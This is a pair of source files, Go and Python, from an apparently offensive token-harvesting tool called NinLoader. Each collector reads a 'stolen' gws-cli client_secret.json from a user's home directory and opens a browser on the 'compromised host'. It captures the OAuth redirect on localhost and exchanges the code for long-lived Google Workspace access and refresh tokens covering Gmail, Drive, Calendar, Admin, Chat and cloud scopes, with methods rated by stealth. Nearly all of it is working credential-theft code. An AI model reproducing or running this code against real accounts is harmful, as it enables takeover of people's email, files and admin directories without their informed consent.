File: ninloader/go/collectors/google/gws_cli.go
package google

import (
	"context"
	"encoding/json"
	"fmt"
	"io"
	"net"
	"net/http"
	"net/url"
	"os"
	"os/exec"
	"path/filepath"
	"runtime"
	"strings"
	"sync"
	"time"

	"github.com/ninken/ninloader-go/internal/collector"
	"github.com/ninken/ninloader-go/internal/platform"
	"github.com/ninken/ninloader-go/internal/registry"
	"github.com/ninken/ninloader-go/internal/types"
	"github.com/ninken/ninloader-go/internal/validator"
)

const (
	gwsTokenEndpoint = "https://oauth2.googleapis.com/token"
	gwsOAuthAuthURL  = "https://accounts.google.com/o/oauth2/v2/auth"
)

// Default Workspace scopes — maps to Ninken services (Gmail, Drive, Calendar, Admin, Chat, GCP).
var gwsDefaultScopes = strings.Join([]string{
	"openid",
	"email",
	"profile",
	"https://www.googleapis.com/auth/gmail.readonly",
	"https://www.googleapis.com/auth/drive.readonly",
	"https://www.googleapis.com/auth/calendar.readonly",
	"https://www.googleapis.com/auth/admin.directory.user.readonly",
}, " ")

func init() {
	registry.Register("google", "gws_cli", func() collector.Collector {
		return &GwsCliCollector{
			BaseCollector: collector.BaseCollector{Svc: "google", Src: "gws_cli"},
		}
	})
}

// GwsCliCollector collects Google Workspace tokens via the gws-cli
// client_secret.json. It runs an interactive OAuth auth-code flow:
// opens a browser for user consent and captures the redirect on localhost.
//
// Stealth 3: interactive — requires the operator to click "Allow" in a browser.
type GwsCliCollector struct {
	collector.BaseCollector
	scopes       string
	clientSecret string
}

func (c *GwsCliCollector) Service() string          { return c.Svc }
func (c *GwsCliCollector) Source() string            { return c.Src }
func (c *GwsCliCollector) StealthScore() int         { return 3 }
func (c *GwsCliCollector) Platforms() []string       { return nil } // all platforms
func (c *GwsCliCollector) IsPlatformSupported() bool { return true }

// Configure accepts --scopes and --client-secret from the CLI.
func (c *GwsCliCollector) Configure(opts collector.CollectOptions) {
	if opts.Scopes != "" {
		c.scopes = opts.Scopes
	}
	if opts.ClientSecret != "" {
		c.clientSecret = opts.ClientSecret
	}
}

// ── helpers ──────────────────────────────────────────────────

// gwsDir returns ~/.config/gws.
func gwsDir() string {
	return filepath.Join(platform.HomeDir(), ".config", "gws")
}

// clientCredentials holds the parsed client_id + client_secret + optional token_uri.
type clientCredentials struct {
	ClientID     string
	ClientSecret string
	TokenURI     string
}

// readClientSecret reads and parses client_secret.json from the resolved path.
// Path resolution: env GOOGLE_CLIENT_SECRET_PATH > explicit flag > default.
func readClientSecret(overridePath string) *clientCredentials {
	path := filepath.Join(gwsDir(), "client_secret.json")

	if envPath := os.Getenv("GOOGLE_CLIENT_SECRET_PATH"); envPath != "" {
		path = envPath
	}
	if overridePath != "" {
		path = overridePath
	}

	raw, err := os.ReadFile(path)
	if err != nil {
		return nil
	}

	var data struct {
		Installed struct {
			ClientID     string `json:"client_id"`
			ClientSecret string `json:"client_secret"`
			TokenURI     string `json:"token_uri"`
		} `json:"installed"`
	}
	if err := json.Unmarshal(raw, &data); err != nil {
		return nil
	}
	if data.Installed.ClientID == "" || data.Installed.ClientSecret == "" {
		return nil
	}

	return &clientCredentials{
		ClientID:     data.Installed.ClientID,
		ClientSecret: data.Installed.ClientSecret,
		TokenURI:     data.Installed.TokenURI,
	}
}

// clientSecretPath returns the resolved path to client_secret.json (for discovery hints).
func clientSecretPath(overridePath string) string {
	if envPath := os.Getenv("GOOGLE_CLIENT_SECRET_PATH"); envPath != "" {
		return envPath
	}
	if overridePath != "" {
		return overridePath
	}
	return filepath.Join(gwsDir(), "client_secret.json")
}

// ── Discover ─────────────────────────────────────────────────

func (c *GwsCliCollector) Discover() []*types.DiscoveredToken {
	client := readClientSecret(c.clientSecret)
	if client == nil {
		return nil
	}

	hint := client.ClientID
	if len(hint) > 25 {
		hint = hint[:25] + "..."
	}

	return []*types.DiscoveredToken{{
		Service:      c.Svc,
		Source:       c.Src,
		Path:         clientSecretPath(c.clientSecret),
		AccountHint:  fmt.Sprintf("client_id=%s", hint),
		StealthScore: c.StealthScore(),
		Details:      "GWS auth-code flow — Workspace scopes (Gmail/Drive/Calendar/Admin)",
	}}
}

// ── Collect ──────────────────────────────────────────────────

func (c *GwsCliCollector) Collect() []*types.CollectedToken {
	client := readClientSecret(c.clientSecret)
	if client == nil {
		c.Warn("~/.config/gws/client_secret.json not found or invalid")
		return nil
	}

	c.Info("Starting OAuth flow with stolen gws-cli client_secret.json...")

	// 1. Bind a random port for the redirect capture server.
	ln, err := net.Listen("tcp", "127.0.0.1:0")
	if err != nil {
		c.Warn(fmt.Sprintf("Failed to bind capture port: %v", err))
		return nil
	}
	port := ln.Addr().(*net.TCPAddr).Port
	redirectURI := fmt.Sprintf("http://localhost:%d", port)

	// 2. Set up the capture server.
	var (
		authCode string
		mu       sync.Mutex
		done     = make(chan struct{})
	)

	mux := http.NewServeMux()
	mux.HandleFunc("/", func(w http.ResponseWriter, r *http.Request) {
		q := r.URL.Query()

		mu.Lock()
		defer mu.Unlock()

		if code := q.Get("code"); code != "" {
			authCode = code
			w.Header().Set("Content-Type", "text/html")
			w.WriteHeader(http.StatusOK)
			_, _ = w.Write([]byte("<h2>NinLoader: GWS token captured! Close this tab.</h2>"))
			close(done)
			return
		}

		if errParam := q.Get("error"); errParam != "" {
			authCode = "ERROR:" + errParam
			w.WriteHeader(http.StatusOK)
			_, _ = w.Write([]byte("OAuth error"))
			close(done)
			return
		}

		w.WriteHeader(http.StatusOK)
	})

	srv := &http.Server{Handler: mux}

	go func() {
		_ = srv.Serve(ln)
	}()

	// 3. Build OAuth URL.
	scope := c.scopes
	if scope == "" {
		scope = gwsDefaultScopes
	}

	tokenURI := gwsTokenEndpoint
	if client.TokenURI != "" {
		tokenURI = client.TokenURI
	}

	params := url.Values{
		"client_id":     {client.ClientID},
		"redirect_uri":  {redirectURI},
		"response_type": {"code"},
		"scope":         {scope},
		"access_type":   {"offline"},
		"prompt":        {"consent"},
	}
	oauthURL := gwsOAuthAuthURL + "?" + params.Encode()

	// 4. Open browser.
	c.Info("Opening browser for OAuth consent...")
	c.Info("Select your Google account and click Continue -> Allow")
	openBrowser(oauthURL)

	// 5. Wait for redirect (max 3 minutes).
	c.Info(fmt.Sprintf("Waiting for redirect on port %d...", port))

	select {
	case <-done:
		// Got it.
	case <-time.After(180 * time.Second):
		c.Warn("Timeout — no OAuth redirect received (3 min)")
		_ = srv.Shutdown(context.Background())
		return nil
	}
	_ = srv.Shutdown(context.Background())

	mu.Lock()
	code := authCode
	mu.Unlock()

	if code == "" {
		c.Warn("No auth code received")
		return nil
	}
	if strings.HasPrefix(code, "ERROR:") {
		c.Warn(fmt.Sprintf("OAuth error: %s", code))
		return nil
	}

	// 6. Exchange auth code for tokens.
	c.Info("Auth code captured! Exchanging for tokens...")
	tokenData, err := exchangeCode(code, client, redirectURI, tokenURI)
	if err != nil {
		c.Warn(fmt.Sprintf("Token exchange failed: %v", err))
		return nil
	}

	// 7. Decode email from id_token JWT.
	var email string
	if idToken, ok := tokenData["id_token"].(string); ok && idToken != "" {
		if payload := validator.DecodeJWTPayload(idToken); payload != nil {
			if e, ok := payload["email"].(string); ok {
				email = e
			}
		}
	}

	// 8. Build CollectedToken.
	accessToken, _ := tokenData["access_token"].(string)
	refreshToken, _ := tokenData["refresh_token"].(string)
	scopeStr, _ := tokenData["scope"].(string)

	tok := types.NewCollectedToken(c.Svc, c.Src, c.StealthScore())
	tok.AccountID = email
	tok.Username = email
	tok.AccessToken = types.Secure(accessToken)
	tok.RefreshToken = types.Secure(refreshToken)
	tok.ClientID = client.ClientID
	tok.ClientSecret = types.Secure(client.ClientSecret)
	tok.TokenURI = tokenURI
	tok.Scopes = strings.Fields(scopeStr)
	tok.Extra["grant_type"] = "authorization_code"
	tok.Extra["gws_cli"] = true

	c.Info(fmt.Sprintf("SUCCESS — GWS token for %s", orUnknown(email)))
	return []*types.CollectedToken{tok}
}

// ── Shared helpers ───────────────────────────────────────────

// exchangeCode exchanges an authorization code for tokens at the given endpoint.
func exchangeCode(code string, client *clientCredentials, redirectURI, tokenURI string) (map[string]any, error) {
	data := url.Values{
		"code":          {code},
		"client_id":     {client.ClientID},
		"client_secret": {client.ClientSecret},
		"redirect_uri":  {redirectURI},
		"grant_type":    {"authorization_code"},
	}

	resp, err := http.Post(tokenURI, "application/x-www-form-urlencoded", strings.NewReader(data.Encode()))
	if err != nil {
		return nil, fmt.Errorf("POST token endpoint: %w", err)
	}
	defer resp.Body.Close()

	body, err := io.ReadAll(resp.Body)
	if err != nil {
		return nil, fmt.Errorf("read response: %w", err)
	}

	if resp.StatusCode != http.StatusOK {
		return nil, fmt.Errorf("HTTP %d: %s", resp.StatusCode, string(body[:min(len(body), 200)]))
	}

	var result map[string]any
	if err := json.Unmarshal(body, &result); err != nil {
		return nil, fmt.Errorf("parse response: %w", err)
	}
	return result, nil
}

// openBrowser opens a URL in the default browser.
func openBrowser(url string) {
	switch runtime.GOOS {
	case "darwin":
		_ = exec.Command("open", url).Start()
	case "linux":
		_ = exec.Command("xdg-open", url).Start()
	case "windows":
		_ = exec.Command("cmd", "/c", "start", "", url).Start()
	}
}

// orUnknown returns s if non-empty, else "unknown".
func orUnknown(s string) string {
	if s == "" {
		return "unknown"
	}
	return s
}

File: ninloader/ninloader/collectors/google/gws_cli.py
"""Google Workspace CLI (gws-cli) token collector.

Extracts GWS tokens using the gws-cli client_secret.json found at
~/.config/gws/client_secret.json.  This gives Workspace scopes
(Gmail, Drive, Calendar, Admin Directory) — unlike gcloud which
gives only GCP scopes.

Two extraction methods:
  1. Device code flow (all platforms, stealth 3):
     Reads client_secret.json silently, then runs an interactive
     OAuth device code flow. Operator approves via URL.
     No Keychain prompt. Requires google-auth-oauthlib OR urllib.
  2. Token cache decrypt (not recommended on macOS — Keychain prompt):
     Decrypts ~/.config/gws/token_cache.json using Keychain key.
     TRIGGERS VISIBLE PROMPT on macOS. Windows/Linux may be silent.
"""

from __future__ import annotations

import json
import time
import urllib.error
import urllib.parse
import urllib.request
from pathlib import Path
from typing import List, Optional

from ..base import BaseCollector
from .. import CollectorRegistry
from ...types import CollectedToken, DiscoveredToken
from ...secure import secure
from ...platform_utils import home_dir, get_platform

TOKEN_ENDPOINT = "https://oauth2.googleapis.com/token"
DEVICE_AUTH_ENDPOINT = "https://oauth2.googleapis.com/device/code"

# Workspace scopes that map to Ninken services
GWS_SCOPES = [
    "openid",
    "https://www.googleapis.com/auth/userinfo.email",
    "https://www.googleapis.com/auth/userinfo.profile",
    "https://www.googleapis.com/auth/gmail.readonly",
    "https://www.googleapis.com/auth/drive.readonly",
    "https://www.googleapis.com/auth/calendar.readonly",
    "https://www.googleapis.com/auth/admin.directory.user.readonly",
    "https://www.googleapis.com/auth/admin.directory.group.readonly",
    "https://www.googleapis.com/auth/chat.messages.readonly",
    "https://www.googleapis.com/auth/chat.spaces.readonly",
    "https://www.googleapis.com/auth/cloud-platform",
]


def _gws_dir() -> Path:
    return home_dir() / ".config" / "gws"


@CollectorRegistry.register
class GwsCliCollector(BaseCollector):
    """Collect Google Workspace tokens via gws-cli's client_secret.json."""

    service = "google"
    source = "gws_cli"
    stealth_score = 3  # Interactive device code flow

    def _read_client_secret(self) -> Optional[dict]:
        path = _gws_dir() / "client_secret.json"
        if not path.exists():
            return None
        try:
            data = json.loads(path.read_text())
            installed = data.get("installed", {})
            if installed.get("client_id") and installed.get("client_secret"):
                return {
                    "client_id": installed["client_id"],
                    "client_secret": installed["client_secret"],
                }
        except (json.JSONDecodeError, KeyError):
            pass
        return None

    def discover(self) -> List[DiscoveredToken]:
        results = []
        path = _gws_dir() / "client_secret.json"
        client = self._read_client_secret()

        if client:
            token_cache = _gws_dir() / "token_cache.json"
            cache_info = ""
            if token_cache.exists():
                cache_info = f", token_cache.json present ({token_cache.stat().st_size}B, encrypted)"

            results.append(DiscoveredToken(
                service=self.service,
                source=self.source,
                path=str(path),
                account_hint=f"client_id={client['client_id'][:25]}...",
                stealth_score=self.stealth_score,
                details=(
                    f"GWS device code flow — Workspace scopes "
                    f"(Gmail/Drive/Calendar/Admin){cache_info}"
                ),
            ))
        return results

    def collect(self) -> List[CollectedToken]:
        results = []

        client = self._read_client_secret()
        if not client:
            self._warn("~/.config/gws/client_secret.json not found")
            return results

        import http.server
        import socket
        import subprocess
        import threading
        import webbrowser

        self._info("Starting OAuth flow with stolen gws-cli client_secret.json...")

        # 1. Find free port for capture server
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.bind(("127.0.0.1", 0))
            port = s.getsockname()[1]

        redirect_uri = f"http://localhost:{port}"
        auth_code = [None]

        # 2. Capture server
        class CaptureHandler(http.server.BaseHTTPRequestHandler):
            def do_GET(self):
                params = urllib.parse.parse_qs(
                    urllib.parse.urlparse(self.path).query
                )
                if "code" in params:
                    auth_code[0] = params["code"][0]
                    self.send_response(200)
                    self.send_header("Content-Type", "text/html")
                    self.end_headers()
                    self.wfile.write(
                        b"<h2>NinLoader: GWS token captured! Close this tab.</h2>"
                    )
                elif "error" in params:
                    auth_code[0] = "ERROR:" + params.get("error", ["?"])[0]
                    self.send_response(200)
                    self.end_headers()
                    self.wfile.write(b"OAuth error")
                else:
                    self.send_response(200)
                    self.end_headers()

            def log_message(self, *a):
                pass

        server = http.server.HTTPServer(("127.0.0.1", port), CaptureHandler)

        def serve():
            while not auth_code[0]:
                server.handle_request()

        server_thread = threading.Thread(target=serve, daemon=True)
        server_thread.start()

        # 3. Build OAuth URL
        scope = " ".join(GWS_SCOPES)
        oauth_url = (
            "https://accounts.google.com/o/oauth2/auth?"
            + urllib.parse.urlencode(
                {
                    "client_id": client["client_id"],
                    "redirect_uri": redirect_uri,
                    "response_type": "code",
                    "scope": scope,
                    "access_type": "offline",
                    "prompt": "consent",
                },
                quote_via=urllib.parse.quote,
            )
        )

        # 4. Open browser (brief tab flash on compromised host)
        self._info("Opening browser for OAuth consent...")
        self._info("Select your Google account and click Continue → Allow")
        plat = get_platform()
        if plat == "macos":
            subprocess.Popen(
                ["open", "-a", "Google Chrome", oauth_url],
                stdout=subprocess.DEVNULL,
                stderr=subprocess.DEVNULL,
            )
        elif plat == "windows":
            subprocess.Popen(
                ["start", "", oauth_url],
                shell=True,
                stdout=subprocess.DEVNULL,
                stderr=subprocess.DEVNULL,
            )
        else:
            webbrowser.open(oauth_url)

        # 5. Wait for redirect (max 3 minutes)
        self._info(f"Waiting for redirect on port {port}...")
        deadline = time.time() + 180
        while time.time() < deadline and not auth_code[0]:
            time.sleep(0.5)

        server.server_close()

        if not auth_code[0]:
            self._warn("Timeout — no OAuth redirect received (3 min)")
            return results

        if auth_code[0].startswith("ERROR:"):
            self._warn(f"OAuth error: {auth_code[0]}")
            return results

        # 6. Exchange auth code for tokens
        self._info("Auth code captured! Exchanging for tokens...")
        token_data = self._exchange_code(auth_code[0], client, redirect_uri)
        if not token_data:
            return results

        # 7. Extract email from ID token
        email = None
        id_token = token_data.get("id_token", "")
        if id_token:
            email = self._decode_email(id_token)

        results.append(CollectedToken(
            service=self.service,
            source=self.source,
            stealth_score=self.stealth_score,
            account_id=email,
            username=email,
            access_token=secure(token_data.get("access_token", "")),
            refresh_token=secure(token_data.get("refresh_token", "")),
            client_id=client["client_id"],
            client_secret=secure(client["client_secret"]),
            token_uri=TOKEN_ENDPOINT,
            scopes=token_data.get("scope", "").split(),
            expires_at=token_data.get("expires_in"),
            extra={"grant_type": "authorization_code", "gws_cli": True},
        ))

        self._info(f"SUCCESS — GWS token for {email or 'unknown'}")
        return results

    def _exchange_code(
        self, code: str, client: dict, redirect_uri: str
    ) -> Optional[dict]:
        data = urllib.parse.urlencode({
            "code": code,
            "client_id": client["client_id"],
            "client_secret": client["client_secret"],
            "redirect_uri": redirect_uri,
            "grant_type": "authorization_code",
        }).encode()
        req = urllib.request.Request(
            TOKEN_ENDPOINT, data=data,
            headers={"Content-Type": "application/x-www-form-urlencoded"},
        )
        try:
            with urllib.request.urlopen(req, timeout=30) as resp:
                return json.loads(resp.read())
        except urllib.error.URLError as e:
            self._warn(f"Token exchange failed: {e}")
            return None

    @staticmethod
    def _decode_email(id_token: str) -> Optional[str]:
        import base64
        parts = id_token.split(".")
        if len(parts) < 2:
            return None
        try:
            payload_b64 = parts[1] + "=" * (4 - len(parts[1]) % 4)
            payload = json.loads(base64.urlsafe_b64decode(payload_b64))
            return payload.get("email")
        except Exception:
            return None
